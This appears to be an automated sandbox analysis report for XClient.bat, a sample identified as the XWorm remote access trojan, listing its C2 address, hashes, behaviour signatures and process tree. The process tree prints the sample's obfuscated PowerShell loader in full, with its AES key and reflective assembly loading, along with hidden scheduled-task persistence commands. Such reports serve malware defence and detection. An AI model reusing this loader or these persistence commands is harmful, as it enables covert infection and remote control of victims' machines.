Analysis
-
max time kernel
148s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
-
submitted
29-06-2024 16:06
General
-
Target
XClient.bat
-
Size
401KB
-
MD5
ba91ec16f05697b52c5d28f1a250ec71
-
SHA1
02f0502d5270493a302e28c1df808bb29873c109
-
SHA256
886383676ce8cadc259cadd4de3ba03106f012e5084c739d2fdb826b7c2c4c8d
-
SHA512
5b43f4f65559ac9368e6f574e3231fdeff1c81e185a28c44d9e4151fe146298ce2949edf0e1b64724e4d00efc2f80f1517548ea6bc7d9558797bc94fe948001b
-
SSDEEP
12288:XsxR4y6qFoRRh8jDi8gZKLyJ3ToFQBpJ7W5x7B:XN9qFoRRCLmNBLsn
Score
10/10
Malware Config
Extracted
Family
xworm
C2
paris-itself.gl.at.ply.gg:49485
Attributes
-
Install_directory
%Public%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 1 IoCs
-
Modifies registry class 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Public\svchostC:\Users\Public\svchost2⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YnSWh2kl5il3EMjntzhV8DXjrMsXq1qvsxGC5bVHd4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OdoCVEiT8kRX1L6TbGv11A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zTNzi=New-Object System.IO.MemoryStream(,$param_var); $hXjuc=New-Object System.IO.MemoryStream; $naMQO=New-Object System.IO.Compression.GZipStream($zTNzi, [IO.Compression.CompressionMode]::Decompress); $naMQO.CopyTo($hXjuc); $naMQO.Dispose(); $zTNzi.Dispose(); $hXjuc.Dispose(); $hXjuc.ToArray();}function execute_function($param_var,$param2_var){ $plvam=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kLZRH=$plvam.EntryPoint; $kLZRH.Invoke($null, $param2_var);}$ZnpwU = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$host.UI.RawUI.WindowTitle = $ZnpwU;$zIJcx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZnpwU).Split([Environment]::NewLine);foreach ($vIuJs in $zIJcx) { if ($vIuJs.StartsWith('KSgXqCUIyvjlHChvQmvc')) { $FzXsd=$vIuJs.Substring(20); break; }}$payloads_var=[string[]]$FzXsd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_87_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YnSWh2kl5il3EMjntzhV8DXjrMsXq1qvsxGC5bVHd4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OdoCVEiT8kRX1L6TbGv11A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zTNzi=New-Object System.IO.MemoryStream(,$param_var); $hXjuc=New-Object System.IO.MemoryStream; $naMQO=New-Object System.IO.Compression.GZipStream($zTNzi, [IO.Compression.CompressionMode]::Decompress); $naMQO.CopyTo($hXjuc); $naMQO.Dispose(); $zTNzi.Dispose(); $hXjuc.Dispose(); $hXjuc.ToArray();}function execute_function($param_var,$param2_var){ $plvam=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kLZRH=$plvam.EntryPoint; $kLZRH.Invoke($null, $param2_var);}$ZnpwU = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.bat';$host.UI.RawUI.WindowTitle = $ZnpwU;$zIJcx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZnpwU).Split([Environment]::NewLine);foreach ($vIuJs in $zIJcx) { if ($vIuJs.StartsWith('KSgXqCUIyvjlHChvQmvc')) { $FzXsd=$vIuJs.Substring(20); break; }}$payloads_var=[string[]]$FzXsd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost"7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "svchost"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA94B.tmp.bat""7⤵
-
C:\Windows\system32\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
1KB
MD53ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA168a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2cwk0mb3.x35.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmpA94B.tmp.batFilesize
171B
MD57a40b3cbfe54feb87373b2f6f7f4e913
SHA121f3b1056685448191bd53a92e9f75cdafc1da08
SHA2564357816375d060f0bd1568b460c946a825a88b965b38a88b7802930c2e0c5501
SHA51240a3258506e41c7db56a0ad9de67520fae3960d86745eb6caedf2180b586c538ec5979461116ca95c1c730ba3a1be5d48f403a71d2759f85220bbc9242e99ae2
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.batFilesize
401KB
MD5ba91ec16f05697b52c5d28f1a250ec71
SHA102f0502d5270493a302e28c1df808bb29873c109
SHA256886383676ce8cadc259cadd4de3ba03106f012e5084c739d2fdb826b7c2c4c8d
SHA5125b43f4f65559ac9368e6f574e3231fdeff1c81e185a28c44d9e4151fe146298ce2949edf0e1b64724e4d00efc2f80f1517548ea6bc7d9558797bc94fe948001b
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.vbsFilesize
123B
MD56a106b5df4530d40fd00bc8b806ebff6
SHA1fafee4fd7d92c876387e854764274f90ea6d2b38
SHA256045ccfdbfabbdca68f2efaaa2eb1d73ee530fd30bc39f200df5f4a94cf152bac
SHA512e3ed771324cda75f70208e988177ec1f39e9f359f0fe1b771d267d73db41351e8f45a2cb42b9f0dc93349311e09d07fa44a132bb9eb40e8e9cb108ea24890552
-
C:\Users\Public\svchostFilesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
memory/984-53-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/1172-58-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/1412-103-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/1604-111-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/1788-109-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/1940-14-0x000001CCA67A0000-0x000001CCA67A8000-memory.dmpFilesize
32KB
-
memory/1940-9-0x000001CCA6750000-0x000001CCA6772000-memory.dmpFilesize
136KB
-
memory/1940-15-0x000001CCA6B70000-0x000001CCA6BBE000-memory.dmpFilesize
312KB
-
memory/1940-13-0x000001CCA6BC0000-0x000001CCA6C06000-memory.dmpFilesize
280KB
-
memory/1940-10-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/1940-0-0x00007FFC12113000-0x00007FFC12115000-memory.dmpFilesize
8KB
-
memory/1940-139-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/1940-12-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/1940-11-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/1968-57-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2076-107-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2268-110-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2548-60-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2648-54-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2668-108-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2788-104-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/2836-106-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/3052-17-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/3052-30-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/3052-27-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/3052-26-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
memory/3144-52-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/3144-47-0x0000000000930000-0x000000000095A000-memory.dmpFilesize
168KB
-
memory/3556-61-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/4048-102-0x0000021F38E40000-0x0000021F38E58000-memory.dmpFilesize
96KB
-
memory/4360-105-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB